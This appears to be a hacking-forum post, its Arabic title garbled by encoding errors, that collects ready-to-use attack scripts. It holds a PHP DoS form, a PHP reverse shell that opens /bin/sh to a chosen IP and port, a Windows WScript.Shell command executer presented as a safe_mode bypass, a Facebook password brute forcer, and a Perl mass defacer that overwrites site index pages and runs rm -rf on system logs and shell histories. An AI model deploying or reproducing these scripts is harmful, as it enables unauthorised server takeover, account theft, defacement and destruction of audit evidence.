ãÌãæÚÉ ÔíáÇÊ æ ÓßÑÈÊÇÊ , DoS attack,proc_open,Facbook Brute Forcer,Mass Defacer,Priv8 2013
DoS attack
,
ßæÏ PHP:
<?php
$ip = $_SERVER***91;'REMOTE_ADDR'***93;;
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta ***********="content-type" content="text/html; charset=iso-8859-1">
<meta name="author" content="">
<title>PHP DoS, Coded by EXE</title>
</head>
<!-- PHP DOS, coded by virus noir -->
<style type="text/css">
<!--
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}
-->
</style>
<!-- PHP DOS, coded by EXE -->
<body>
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font> (Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value=" Start the Attack---> ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>
</form>
</center>
<!-- PHP DOS, coded by EXE -->
</body>
</html>
proc_open
ßæÏ PHP:
<?php
/*
/This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software /Foundation, either version 3 of the License, or (at your option) any later version.
/
/This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A /PARTICULAR PURPOSE. See the GNU General Public License for more details.
/
/You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
echo "<title>CB Via proc_open</title><hr>Help : http://site.com/magic.php?id=127.0.0.1&port=1370<br><hr>";
set_time_limit (0);
$VERSION = "1.0";
$ip = $_GET***91;'ip'***93;;
$port = $_GET***91;'port'***93;;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = "uname -a; w; id; /bin/sh -i";
$daemon = 0;
$debug = 0;
if (function_exists("pcntl_fork")) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Cant fork");
exit(1);
}
if ($pid) {
exit(0);
}
if (posix_setsid() == -1) {
printit("Error: Cant setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") );
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Cant spawn shell");
exit(1);
}
stream_set_blocking($pipes***91;0***93;, 0); stream_set_blocking($pipes***91;1***93;, 0);
stream_set_blocking($pipes***91;2***93;, 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes***91;1***93;)) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes***91;1***93;, $pipes***91;2***93;);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes***91;0***93;, $input);
}
if (in_array($pipes***91;1***93;, $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes***91;1***93;, $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes***91;2***93;, $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes***91;2***93;, $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes***91;0***93;);
fclose($pipes***91;1***93;);
fclose($pipes***91;2***93;);
proc_close($process);
function printit ($string) {if (!$daemon) { print "$string\n"; } }
?>
ßæÏ PHP:
<?php
//PHP COM extensions (inconsistent Win32) safe_mode bypass
$____suntzu = new COM(“WScript.Shell”);
$____suntzu->Run(‘c:windowssystem32cmd.exe /c ‘.escapeshellarg($_GET***91;cmd***93;).’ > ‘.dirname($_SERVER***91;SCRIPT_FILENAME***93;).’/djekmani.txt’);
$____suntzoi=file(“suntzoi.txt”);
for ($i=0; $i<count($____djekmani); $i++) {echo nl2br(htmlentities($____djekmani***91;$i***93;));}
// *quote* from the php manual:
// There is no installation needed to use these functions; they are part of the PHP core.
// The windows version of PHP has built in support for this extension. You do not need to load any additional extension in order to use these functions.
// You are responsible for installing support for the various COM objects that you intend to use (such as MS Word);
// we don’t and can’t bundle all of those with PHP.
?>
ßæÏ PHP:
<body bgcolor=black>
<center><font color=green>COMMAND EXECUTER (CODED BY NEO)</font></center>
<div align="center"><center>
<table width="558" height="560" border="1" id="AutoNumber1">
<tr>
<td width="49%" height="158"><p><?php
//is safe mod on ? start
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safe="<font color=red>ON</font>";
}
else {$safe="<font color=green>OFF</font>";}
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>";
//open safe mod end--
?>
<p>
<?php
//is open basedir on ? start
$n = @ini_get('open_basedir');
if (!empty($n))
{
$base = @ini_restore("open_basedir");
}
else {$base="<font color=green>NONE</font>";}
echo "<font color=whitepurple>OPEN_BASEDIR :</font><b>$base</b><br>";
//open basedir end--
?>
<p align="left">
<?php
//disable function start
echo "<font color=whitepurple>Disable functions :</font> <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
//disable function end--
?>
<p align="left">
<?php
//phpver start
$phpver=phpversion();
echo "<font color=whitepurple>PHP Version :</font><font color=red><b>$phpver</b></font><br>";
//phpver end--
?>
<p align="left">
<?php
//path of win
$dir = @getcwd();
echo "<font color=whitepurple>U'Re In :</font><font color=red><b>$dir</b></font><br>";
//end
?>
<?php
print "<form method=post>";
print "<b><font color=white>cmd:</b></font><input size=50 name='command' value=''>";
print "<br>";
print "<b><font color=white>file :</b></font><input size=50 name='file' value=''>";
print "<br>";
print "<input type=submit name=_act value='Execute!'>";
$post = $_POST***91;'command'***93;;
$file = $_POST***91;'file'***93;;
?>
<?php
$_file = new COM("WScript.Shell");
$_file ->Run('cmd.exe /c'.$post.' > '.dirname($_SERVER***91;SCRIPT_FILENAME***93;).'/'.$file.'');
?>
Facbook Brute Forcer
ßæÏ PHP:
1.
################################
2.
# Face Book Brute Forcer
3.
################################
4.
set_time_limit(0);
5.
$username =”brute@force.org”; // username to brute force
6.
$dictionary =”dictionary.txt”; // need dictionary to password list
7.
8.
function kontrol($kullaniciadi,$sifre){
9.
$useragent = “Opera/9.21 (Windows NT 5.1; U; tr)”;
10.
$data = “email=$kullaniciadi&pass=$sifre&login=Login” ;
11.
$ch = curl_init(‘https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php’);
12.
curl_setopt($ch, CURLOPT_HEADER, 0);
13.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
14.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
15.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
16.
curl_setopt($ch, CURLOPT_POST, 1);
17.
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
18.
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
19.
curl_setopt($ch, CURLOPT_******FILE, ‘******.txt’);
20.
curl_setopt($ch, CURLOPT_******JAR, ‘******.txt’);
21.
$source=curl_exec ($ch);
22.
curl_close ($ch);
23.
if(eregi(“Home”,$source)){return true;} else {return false;}
24.
25.
}
26.
27.
if(!is_file($dictionary)){echo “$dictionary is not file”;exit;}
28.
$lines=file($dictionary);
29.
echo “Attack Starting..
30.
“;
31.
sleep(10);
32.
echo “Attack Started, brute forcing..
33.
“;
34.
foreach($lines as $line){
35.
$line=str_replace(“r”,”",$line);
36.
$line=str_replace(“n”,”",$line);
37.
if(kontrol($username,$line)){echo “***91;+***93; username:$username , password:$line – P
38.
assword found : $line
39.
“;$fp=fopen(‘******.txt’,'w’);fwrite($fp,”);exit;}
40.
else{echo “***91;-***93; username:$username , password:$line – Password not found :
41.
$line
42.
“;}
43.
}
44.
?>
</b> Mass Defacer
ßæÏ PHP:
1.
#########################################################################################################
2.
# DaiMon V 0.1 #
3.
# #
4.
# DaiMon Hacker mass defacer and log eraser #
5.
# #
6.
# coded by DaiMon #
7.
# #
8.
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
9.
# #
10.
# 05/07/2005 #
11.
# #
12.
# usage : perl MSRml.pl #
13.
# #
14.
# example : perl MSRml.pl /tmp/index.html #
15.
# #
16.
# #
17.
#########################################################################################################
18.
#!/usr/bin/perl
19.
use strict;
20.
my $index = $ARGV***91;0***93;;
21.
if ($ARGV***91;0***93;)
22.
{
23.
if( -e $index )
24.
{
25.
system "echo -e \"\033***91;01;34mStarted DaiMon V0.1 by PRI***91;ll Ok !!\033***91;01;37m\"\n";
26.
system "echo -e \"\\033***91;01;37mDefacing all homepages ...\"\n";
27.
system "find / -name \"index*\" -exec cp $index {} \\;";
28.
system "find / -name \"main*\" -exec cp $index {} \\;";
29.
system "find / -name \"home*\" -exec cp $index {} \\;";
30.
system "find / -name \"default*\" -exec cp $index {} \\;";
31.
system "echo -e \"\\033***91;01;37m***91;+***93; done ! all sites in this box should be defaced !\"\n";
32.
system "echo -e \"\\033***91;01;37m----------------------------------------------------------\"\n";
33.
system "echo -e \"\\033***91;01;37mCleaning up logs ...\"\n";
34.
system "echo -e \"\033***91;01;34m---------erasing default log files (too fast =))---------\033***91;01;37m\"\n";
35.
if( -e "/var/log/lastlog" )
36.
{
37.
system 'rm -rf /var/log/lastlog';
38.
system "echo -e \"\\033***91;01;37m***91;****93;/var/log/lastlog -erased Ok\"\n";
39.
}
40.
else
41.
{
42.
system "echo -e \"\\033***91;01;31m***91;****93;/var/log/lastlog - No such file or directory\\033***91;01;37m\"\n";
43.
}
44.
if( -e "/var/log/wtmp" )
45.
{
46.
system 'rm -rf /var/log/wtmp';
47.
system "echo -e \"\\033***91;01;37m***91;****93;/var/log/wtmp -erased Ok\"\n";
48.
}
49.
else
50.
{
51.
system "echo -e \"\\033***91;01;31m***91;****93;/var/log/wtmp - No such file or directory\\033***91;01;37m\"\n";
52.
}
53.
if( -e "/etc/wtmp" )
54.
{
55.
system 'rm -rf /etc/wtmp';
56.
system "echo -e \"\\033***91;01;37m***91;****93;/etc/wtmp -erased Ok\"\n";
57.
}
58.
else
59.
{
60.
system "echo -e \"\\033***91;01;31m***91;****93;/etc/wtmp - No such file or directory\\033***91;01;37m\"\n";
61.
}
62.
if( -e "/var/run/utmp" )
63.
{
64.
system 'rm -rf /var/run/utmp';
65.
system "echo -e \"\\033***91;01;37m***91;****93;/var/run/utmp -erased Ok\"\n";
66.
}
67.
else
68.
{
69.
system "echo -e \"\\033***91;01;31m***91;****93;/var/run/utmp - No such file or directory\\033***91;01;37m\"\n";
70.
}
71.
if( -e "/etc/utmp" )
72.
{
73.
system 'rm -rf /etc/utmp';
74.
system "echo -e \"\\033***91;01;37m***91;****93;/etc/utmp -erased Ok\"\n";
75.
}
76.
else
77.
{
78.
system "echo -e \"\\033***91;01;31m***91;****93;/etc/utmp - No such file or directory\\033***91;01;37m\"\n";
79.
}
80.
if( -e "/var/log" )
81.
{
82.
system 'rm -rf /var/log';
83.
system "echo -e \"\\033***91;01;37m***91;****93;/var/log -erased Ok\"\n";
84.
}
85.
else
86.
{
87.
system "echo -e \"\\033***91;01;31m***91;****93;/var/log - No such file or directory\\033***91;01;37m\"\n";
88.
}
89.
if( -e "/var/logs" )
90.
{
91.
system 'rm -rf /var/logs';
92.
system "echo -e \"\\033***91;01;37m***91;****93;/var/logs -erased Ok\"\n";
93.
}
94.
else
95.
{
96.
system "echo -e \"\\033***91;01;31m***91;****93;/var/logs - No such file or directory\\033***91;01;37m\"\n";
97.
}
98.
if( -e "/var/adm" )
99.
{
100.
system 'rm -rf /var/adm';
101.
system "echo -e \"\\033***91;01;37m***91;****93;/var/adm -erased Ok\"\n";
102.
}
103.
else
104.
{
105.
system "echo -e \"\\033***91;01;31m***91;****93;/var/adm - No such file or directory\\033***91;01;37m\"\n";
106.
}
107.
if( -e "/var/apache/log" )
108.
{
109.
system 'rm -rf /var/apache/log';
110.
system "echo -e \"\\033***91;01;37m***91;****93;/var/apache/log -erased Ok\"\n";
111.
}
112.
else
113.
{
114.
system "echo -e \"\\033***91;01;31m***91;****93;/var/apache/log - No such file or directory\\033***91;01;37m\"\n";
115.
}
116.
if( -e "/var/apache/logs" )
117.
{
118.
system 'rm -rf /var/apache/logs';
119.
system "echo -e \"\\033***91;01;37m***91;****93;/var/apache/logs -erased Ok\"\n";
120.
}
121.
else
122.
{
123.
system "echo -e \"\\033***91;01;31m***91;****93;/var/apache/logs - No such file or directory\\033***91;01;37m\"\n";
124.
}
125.
if( -e "/usr/local/apache/log" )
126.
{
127.
system 'rm -rf /usr/local/apache/log';
128.
system "echo -e \"\\033***91;01;37m***91;****93;/usr/local/apache/log -erased Ok\"\n";
129.
}
130.
else
131.
{
132.
system "echo -e \"\\033***91;01;31m***91;****93;/usr/local/apache/log - No such file or directory\\033***91;01;37m\"\n";
133.
}
134.
if( -e "/usr/local/apache/logs" )
135.
{
136.
system 'rm -rf /usr/local/apache/logs';
137.
system "echo -e \"\\033***91;01;37m***91;****93;/usr/local/apache/logs -erased Ok\"\n";
138.
}
139.
else
140.
{
141.
system "echo -e \"\\033***91;01;31m***91;****93;/usr/local/apache/logs - No such file or directory\\033***91;01;37m\"\n";
142.
}
143.
if( -e "/root/.bash_history" )
144.
{
145.
system 'rm -rf /root/.bash_history';
146.
system "echo -e \"\\033***91;01;37m***91;****93;/root/.bash_history -erased Ok\"\n";
147.
}
148.
else
149.
{
150.
system "echo -e \"\\033***91;01;31m***91;****93;/root/.bash_history - No such file or directory\\033***91;01;37m\"\n";
151.
}
152.
if( -e "/root/.ksh_history" )
153.
{
154.
system 'rm -rf /root/.ksh_history';
155.
system "echo -e \"\\033***91;01;37m***91;****93;/root/.ksh_history -erased Ok\"\n";
156.
}
157.
else
158.
{
159.
system "echo -e \"\\033***91;01;31m***91;****93;/root/.ksh_history - No such file or directory\\033***91;01;37m\"\n";
160.
}
161.
system "echo -e \"\\033***91;01;37m***91;+***93; -----done all default log and bash_history files erased !!\"\n";
162.
system "echo -e \"\033***91;01;34m---------Now Erasing the rest of the machine log files (can be long :S)---------\033***91;01;37m\"\n";
163.
system 'find / -name *.bash_history -exec rm -rf {} \;';
164.
system "echo -e \"\\033***91;01;37m***91;****93; all *.bash_history files -erased Ok!\"\n";
165.
system 'find / -name *.bash_logout -exec rm -rf {} \;';
166.
system "echo -e \"\\033***91;01;37m***91;****93; all *.bash_logout files -erased Ok!\"\n";
167.
system 'find / -name "log*" -exec rm -rf {} \;';
168.
system "echo -e \"\\033***91;01;37m***91;****93; all log* files -erased Ok!\"\n";
169.
system 'find / -name *.log -exec rm -rf {} \;';
170.
system "echo -e \"\\033***91;01;37m***91;****93; all *.log files -erased Ok!\"\n";
171.
system "echo -e \"\033***91;01;34m-------***91;+***93; !done all log files erased!***91;+***93;-------\033***91;01;37m\"\n";
172.
system "echo -e \"\033***91;01;34m---------------------------------------------------\033***91;01;37m\"\n";
173.
system "echo -e \"\033***91;01;34m-----------------DaiMon V 0.1----------------------\033***91;01;37m\"\n";
174.
}
175.
else
176.
{
177.
system "echo -e \"\\033***91;01;31m***91;-***93; Failed ! the path to u're index could not be found !\\033***91;01;37m\"\n";
178.
exit;
179.
}
180.
}
181.
else
182.
{
183.
system "echo -e \"\\033***91;01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!\"\n";
184.
system "echo -e \"\\033***91;01;37m!!!!!!!!!!!!!!!!!!coded by DaiMon!!!!!!!!!!!!!!!!!!!!!!!!\"\n";
185.
system "echo -e \"\\033***91;01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\\033***91;01;37m\"\n";
186.
system "echo -e \"\\033***91;01;37musage : perl $0 \"\n";
187.
system "echo -e \"\\033***91;01;37mexample : perl $0 /tmp/index.html\"\n";
188.
exit;
189.
}
ÔíáÇÊ æ ÓßÑÈÊÇÊ ÈÕíÛÉ php + asp
ÇÖÛØ åäÇ ááÊÍãíá
ÇäÊåì ÇáãæÖæÚ :SnipeR (36)::SnipeR (36): |
